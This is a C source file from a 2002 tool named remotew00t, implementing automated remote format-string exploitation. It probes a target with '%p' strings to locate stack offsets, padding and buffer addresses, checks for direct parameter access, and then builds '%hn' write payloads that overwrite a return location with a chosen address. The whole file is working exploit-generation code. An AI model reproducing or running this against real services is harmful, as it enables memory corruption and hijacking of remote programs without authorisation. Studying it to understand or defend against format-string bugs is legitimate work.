/* remotew00t 
 * Copyright (C) 2002 Andrew Griffiths
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>

#include "logger.h"
#include "memory.h"
#include "util.h"
#include "formatstring.h"

extern int debugflag;

/*
 * The optimised direct parameter doesn't work :-( at the moment.
 */


/*
 * taken & modified & adapted from scut's nice formatstring document.
 *
 * possible to make it do a whole 4 byte addr?
 */

int formatstring_getpadding(formatstring_t *format, int write_byte)
{
    int padding;
    
    write_byte += 0x10000;
    format->bytes_written_running %= 0x10000;
    
    padding = (write_byte - format->bytes_written_running) % 0x10000;
    if(padding < 10) padding += 0x10000;
    
    format->bytes_written_running += padding;
    return padding;
}

formatstring_t *formatstring_new()
{
    formatstring_t *ret;
    
    getmem(ret = malloc(sizeof(struct formatstring_t)+1));
    clearmem(ret, sizeof(struct formatstring_t)+1);
    
    ret->stackpops++;
    
    return ret;
}

void formatstring_put(formatstring_t *kill)
{
    if(kill->trigger) free(kill->trigger);
    free(kill);
}

void formatstring_set_written(formatstring_t *format, int written)
{
    if(debugflag) assert(format != NULL);
    format->bytes_written = format->bytes_written_running = written;
}

void formatstring_set_trigger(formatstring_t *format, char *trigger)
{
    if(debugflag) {
	assert(format != NULL);
	log("formatstring_set_trigger(): adding \"%s\"\n", trigger);
    }
    if(format->trigger) free(format->trigger);
    if(trigger == NULL) {
	format->trigger = NULL;
    } else {
	getmem(format->trigger = strdup(trigger));
    }
}

char *formatstring_getvalues(formatstring_t *format, u_int32_t host, short int port)
{
    char *send=NULL;
    int send_len;
    int padtmp, stacktmp;

    if(debugflag) log("format->getvalues_state: %d\n", format->getvalues_state);

    switch(format->getvalues_state) {
    case GETVALUES_STACKPAD:
	if(format->trigger) {
	    send_len = strlen(format->trigger) + format->padding + (format->stackpops * 2) + 4 + 8;
	} else {
	    send_len = format->padding + (format->stackpops * 2) + 4 + 8;  
	}
	
	if(debugflag) log("formatstring_getvalues(): got %d for len\n", send_len);
	
	getmem(send = malloc(send_len + 1));
	clearmem(send, send_len + 1);
	if(format->trigger) strcpy(send, format->trigger);

	/* On my linux box, it allows me to strcat without having any text in
	  the buffer first. Dunno about others... */

	for(padtmp = format->padding; padtmp != 0; padtmp--)
	    strcat(send, "x");

	/* 
	 * Oh, btw, it doesn't work if you have the padding after the AAAABBBB 
	 * bit :-)
	 */

	strcat(send, "AAAABBBB");
		    
	for(stacktmp = format->stackpops; stacktmp != 1; stacktmp--) 
	    strcat(send, "%p");
	
	strcat(send, "|%p|");
	
	if(strlen(send) >= send_len) {
	    /* 
	     * Hmmm... I'm not sure what do. Should I just _exit()?
	     * This was to catch problems when I'd add extra stuff and not
	     * update how much space I need. So it'll stay for a while.
	     */
	    log("formatstring_values(): Oh shit. our send buffer has been overflowed by %d bytes.\n", strlen(send) - send_len);
	    util_abort();
	}
	
	break;
    case GETVALUES_RETADDR:
	if(format->getvalues_tmp == 0) format->getvalues_tmp++;
	
	send_len = ((format->getvalues_tmp) * 2) + 6;
	if(format->trigger) send_len += strlen(format->trigger);
	
	getmem(send = malloc(send_len + 1));
	clearmem(send, send_len + 1);
	if(format->trigger) strcpy(send, format->trigger);

	if(format->getvalues_inner_state == 0) {
	    for(padtmp = format->getvalues_tmp; padtmp != 0; padtmp --)
		strcat(send, "%p");
		
	    strcat(send, "|%s|");
	} else if(format->getvalues_inner_state == 1) {
	    /* okay it worked. */
	    for(padtmp = format->getvalues_tmp; padtmp != 0; padtmp --)
		strcat(send, "%p");
		
	    strcat(send, "|%p|");
	}
	
    break;
    case GETVALUES_DIRECTACCESS:
	if(format->getvalues_tmp == 0) format->getvalues_tmp = 1;
	
	send_len = (format->padding) + (format->getvalues_tmp * 11);
	if(format->trigger) send_len += strlen(format->trigger);
	getmem(send = malloc(send_len + 1));
	clearmem(send, send_len + 1);
	
	if(format->trigger) strcpy(send, format->trigger);
	
	for(padtmp = format->padding; padtmp != 0; padtmp --) 
	    strcat(send, "x");

	/* thats the 4 out of 11 */

	for(stacktmp = format->getvalues_tmp; stacktmp != 0; stacktmp --) 
	    strcat(send, "AAAA");
	    
	/* and that makes 11/11 */
	for(stacktmp = format->getvalues_tmp; stacktmp != 0; stacktmp --)
	    sprintf(send + strlen(send), "%%%d$08x", (format->stackpops) + stacktmp);
	

    break;
    }
    
    if(debugflag) log("formatstring_getvalues(): okay, ended up with \"%s\"\n", send);
    
    return send;
}

int formatstring_analyse(formatstring_t *format, char *reply)
{
    char *p, *q;

    if(format->getvalues_failed == 1) {
	/* formatstring_analyzse_failed() fixs the problem... if it doesn't
	 * it'll return an error, and we shouldn't reach here... so..
	 *
	 * FIXME: add a flag to catch FATAL errors here, instead of assuming
	 * formatstring_analyse_failed() catches it.
	 */
	format->getvalues_failed = 0;
	return 1;
    }
    
    switch(format->getvalues_state) {
    case GETVALUES_STACKPAD:
	p = strchr(reply, '|');
	if(p == NULL) {
	    log("formatstring_analyse(): Interesting. we couldn't find | in the reply. Bailing\n");
	    return -1;
	}
    
	if(strstr(p, "41414141") == NULL) {
	    if((strstr(p, "4141") == NULL) && (strstr(p, "4142") == NULL) && (strstr(p, "4241")==NULL)) {
		format->stackpops++;
		format->padding = 0;
	    } else {
	    
		/* 
		 * Lets say we got 4142 in the thinger, and to see if its 
		 * correct, and we pop two, we now no longer have a thinger, 
		 * and it needs to be reset.
		 */
		if(format->padding < 3) {
		    format->padding++;
		} else {
		    format->padding = 0;
		    format->stackpops++;
		}
	    }
	} else {
	    /* found it. We need to -1 from stackpops, otherwise we pop to far*/
	    if(debugflag) {
		log("formatstring_analyse(): Okay ended up with %d stackpops and %d bytes of padding\n", 
		    format->stackpops, format->padding);
	    }
	    format->stackpops--;
	    format->getvalues_state = GETVALUES_RETADDR;
	    return 1;
	}
    
	return 1;
	break; 
    case GETVALUES_RETADDR:
	p = strchr(reply, '|');
	if(p == NULL) {
	    log("formatstring_analyse(): wierd, didn't find '|'\n");
	    return 0;
	}
	
	if(format->getvalues_inner_state == 0) {
	    p++;
	    if(strstr(p, "%s") != NULL) {
		log("formatstring_analyse(): cool, found our str addr. looking for offset.\n");
		while(strncmp(p, "%p", 2) != 0) {
		    p++;
		    format->string_addr_offset++;
		} 
		format->getvalues_inner_state = 1;
		log("formatstring_analyse(): okay, our offset is %d bytes\n",
		    format->string_addr_offset);
	    } else {
		log("formatstring_analyse(): damn, not yet.\n");
		format->getvalues_tmp++;
	    }
	    return 1;
	} else if(format->getvalues_inner_state == 1) {
	    p++;
	    /* if(strchr(p, '|') != NULL) {
		p = strchr(p, '|');
		p++;
	    } */
	    log("formatstring_anaylse(): got \"%s\" to parse\n", p);
	    format->string_addr = strtoul(p, NULL, 16);
	    format->string_addr += (unsigned long) format->string_addr_offset;
	    log("formatstring_analyse(): Got %p for our string_addr\n", format->string_addr);
	    
	    format->getvalues_tmp = 0;
	    format->getvalues_inner_state = 0;
	    format->getvalues_state = GETVALUES_DIRECTACCESS;
	    return 1;
	}
	
	break;
    case GETVALUES_DIRECTACCESS:
	if((p = strstr(reply, "41")) == NULL) {
	    log("formatstring_analyse(): It appears the remote host doesn't "
	    "do direct parameter access. didn't have a \"41\"\n");
	    return 0;
	}
	
	if((q = strrchr(reply, '1')) == NULL) {
	    log("formatstring_analyse(): wtf. is strrchr broken?\n");
	    return 0;
	}
	
	if(*(q-1) != '4') {
	    log("formatstring_analyse(): hmmmm.... the 1 at the end didn't "
	    "have a 4 infront of it.\n");
	    if(format->getvalues_tmp > 1) {
		log("formatstring_analyse(): assuming it worked\n");
		format->direct_parameter_total = format->getvalues_tmp;
		format->direct_parameter = 1;
		format->getvalues_tmp = 0;
	    }
	    return 0;
	}
	
	*(q+1) = '\0';
	
	if(strlen(p) != (format->getvalues_tmp * 8)) {
	    log("Unable to get to the %d place\n", format->getvalues_tmp);
	    if(format->getvalues_tmp > 1) {
		format->direct_parameter_total = format->getvalues_tmp;
		format->direct_parameter = 1;
		format->getvalues_tmp = 0;
	    }
	    
	    return 0;
	} else {
	    format->direct_parameter_total = 1;
	}
    
	format->getvalues_tmp += 2;
    
	return 1;
	break;
    }
    
    /* Catch all, shouldn't really get here. */
    log("formatstring_analyse(): at the end of func, when it shouldn't reach here...\n");
    log("formatstring_analyse(): got %d as the state\n", format->getvalues_state);
    return 0;
}

/* Handle situations where, say the remote side shutdown, or  */

int formatstring_analyse_failed(formatstring_t *format)
{
    if(debugflag) log("format_analyse_failed(): running\n");
    
    switch(format->getvalues_state) {
    case GETVALUES_RETADDR:
	if(format->getvalues_inner_state == 0) {
	    log("format_analyse_failed(): most likely remote segv'd\n");
	    format->getvalues_tmp ++;
	    format->getvalues_failed = 1;
	    return 1;
	}
    break;
    case GETVALUES_DIRECTACCESS:
	log("format_analyse_failed(): direct access failed on host.\n");
	if(format->getvalues_tmp > 1) {
	    log("format_analyse_failed(): assuming it worked and it got %d"
	    " total\n", format->getvalues_tmp);
	    format->direct_parameter = 1;
	    format->direct_parameter_total = format->getvalues_tmp;
	    if(format->direct_parameter_total % 2) format->direct_parameter_total--;
	} else {
	    log("format_analyse_failed(): assuming it didn't work at all\n");
	}
	    
	return 0;
    break;
    }

    log("formatstring_analyse_failed(): Hmmm. unable to work out why it didn't"
	" work.");
    return 0;
}

formatstring_string_t *formatstring_makeformatstring(formatstring_t *format, unsigned long *retloc, unsigned long retaddr)
{
    char *p;
    int i, pad;
    unsigned long retto;
    formatstring_string_t *fmtstr = NULL;
    
    /* reset the bytes_written_running */
    format->bytes_written_running = format->bytes_written;
    

    
    /* 8 = two addrs. 4 = pad between */
    /* 16 = for write %hn's */
    
    if((format->direct_parameter == 0) && (format->optimise == 0)) {
	/* 
	 * At one stage, I'll update this to take note that we can overwrite
	 * multiple addresses.
	 */
    
	getmem(fmtstr = malloc(sizeof(formatstring_string_t) + 1));
	clearmem(fmtstr, sizeof(formatstring_string_t) + 1);
    
	fmtstr->string_len = (format->padding) + ((format->stackpops) * 4) + 8 + 4 + 16;
	if(format->trigger) fmtstr->string_len = strlen(format->trigger);

	assert(fmtstr->string_len < format->remote_bufsize); 

	getmem(fmtstr->formatstr = malloc(fmtstr->string_len + 1));
	clearmem(fmtstr->formatstr, fmtstr->string_len + 1);
    
	if(format->trigger) strcpy(fmtstr->formatstr, format->trigger);
    
	for(i = format->padding;i != 0; i--) {
	    strcat(fmtstr->formatstr, "x");
	    format->bytes_written_running++;
	}

	p = fmtstr->formatstr + strlen(fmtstr->formatstr);
    
	WRITEFMTADDR(p, *retloc);
	WRITEFMTADDR(p + 4, 0x41414141);
	WRITEFMTADDR(p + 8, (*retloc + 2));
	*retloc -= 4;
	format->bytes_written_running += 12;
    
	for(i = format->stackpops; i != 1; i--) {
	    /* 
	    * With %p we can't tell what the written value is, and it's the 
	    * shortest I've seen... %.f doesn't really count for the same 
	    * reason.
	    * %16llx (3:4). I think ll is a gnu extension.
	    */
	    strcat(fmtstr->formatstr, "%10u");
	    format->bytes_written_running += 10;
	}
    
	if(debugflag) log("formatstring_makeformatstring(): Okay, so far we "
	"have: \"%s\":%d\n", fmtstr->formatstr, strlen(fmtstr->formatstr));
	if(strlen(fmtstr->formatstr) > fmtstr->string_len) {
	    log("formatstring_makeformatstring(): Shit. we've overflowed our "
	    "string buffer by %d bytes\n", strlen(fmtstr->formatstr) - fmtstr->string_len);
	    util_abort();
	}
    
	/* Okay, now for the write format part :-) */
    
	if(retaddr) retto = retaddr;
	else retto = format->string_addr + fmtstr->string_len;
    
	pad = formatstring_getpadding(format, (retto) & 0xffff);
	if(debugflag) 
	    log("formatstring_makeformatstring(): Our first write pad is %d\n", pad);

	p = fmtstr->formatstr + strlen(fmtstr->formatstr);
	sprintf(p, "%%%du%%hn", pad);
    
	pad = formatstring_getpadding(format, (retto >> 16) & 0xffff);
	if(debugflag)
	    log("formatstring_makeformatstring(): Our second write pad is %d\n", pad);
	
	p += strlen(p);
	sprintf(p, "%%%du%%hn", pad);
    
	if(strlen(fmtstr->formatstr) > fmtstr->string_len) {
	    log("formatstring_makeformatstring(): Damn. we've overflowed our"
	    "string buffer by %d bytes\n", strlen(fmtstr->formatstr) - fmtstr->string_len);
	    util_abort();
	}
    
	if(debugflag) 
	    log("formatstring_makeformatstring(): So far we have \"%s\":%d\n", 
	    fmtstr->formatstr, fmtstr->formatstr);

    } else if((format->direct_parameter == 1) && (format->optimise == 1)) {
	int print_total;
	int len_total;
    
	if(!format->remote_bufsize) {
	    log("formatstring_makeformatstring(): Okays. someone forgot to set "
	    "the buffersize\n");
	    return NULL;
	}
    
	print_total = (format->direct_parameter_total - format->stackpops);
	len_total = print_total * 40;
	for(; len_total > format->remote_bufsize; print_total --) {
	    /* 8 bytes for addresses, 20 for %11$20314d and 12 for %15$hn */
	    len_total = print_total * 40;
	}
	
	getmem(fmtstr = malloc(sizeof(formatstring_string_t) + 1));
	clearmem(fmtstr, sizeof(formatstring_string_t) + 1);

	if(debugflag) log("formatstring_makeformatstring(): len_total: %d\n", 
	    len_total);
	
	getmem(fmtstr->formatstr = malloc(len_total + 1));
	clearmem(fmtstr->formatstr, len_total + 1);
	
	/* hardly the most reliable way. */
	/* fmtstr->string_len = len_total; */
	
	/* It appears I forgot to add the padding, which is required to make
	 * the addresses line up on the stack. DOH!@! */
	
	for(i=0; i < (format->padding + 3); i++)
	    strcat(fmtstr->formatstr, "x");
	
	for(i=0; i < print_total; i++) {
	    p = fmtstr->formatstr;
	    p += strlen(p);
	    
	    WRITEFMTADDR(p, *retloc);
	    p += 4;
	    WRITEFMTADDR(p, (*retloc + 2));
	    *retloc -= 4;
	    format->bytes_written_running += 8;
	}
	
	if(retaddr) retto = retaddr;
	else retto = format->string_addr;
	
	
	for(i=0; i < print_total; i+=2) {
	    p = fmtstr->formatstr;
	    p += strlen(p);
	
	    /* format->bytes_written_running += 3; */
	    pad = formatstring_getpadding(format, (retto) & 0xffff);
	    
	    sprintf(p, "%%%d$%du%%%d$hn", (format->stackpops), 
		pad, (format->stackpops) + 1 + i);
	
	
	    p += strlen(p);
	    
	    pad = formatstring_getpadding(format, (retto >> 16) & 0xff);
	    sprintf(p, "%%%d$%du%%%d$hn", (format->stackpops), pad, 
		(format->stackpops) + 2 + i);
	    
	}
	
	fmtstr->string_len = strlen(fmtstr->formatstr);
	log("got %s:%d\n", fmtstr->formatstr, strlen(fmtstr->formatstr));
    
    }

    if(fmtstr == NULL) {
	log("formatstring_makeformatstring(): returning NULL\n");
	log("formatstring_makeformatstring(): direct_parameter: %d\t optimise: %d\n", format->direct_parameter, format->optimise);
    } else if(debugflag) {
	log("formatstring_makeformatstring(): fmtstr->string_len: %d\n");
    }

    return fmtstr;
}

void formatstring_string_put(formatstring_string_t *fmtstr)
{
    free(fmtstr->formatstr);
    free(fmtstr);
}

void formatstring_set_buffersize(formatstring_t *format, int bufsize)
{
    format->remote_bufsize = bufsize;
}

void formatstring_set_optimise(formatstring_t *format, int optimise)
{
    format->optimise = optimise;
    if((!format->remote_bufsize) && (debugflag)) 
	log("format_set_optimise(): We've been called but the buffersize hasn't been set yet...\n");
    
}

void formatstring_mod_stackpops(formatstring_t *format, int amount)
{
    format->stackpops += amount;
}

void formatstring_turnoff_directparameter(formatstring_t *format)
{
    format->direct_parameter = 0;
}

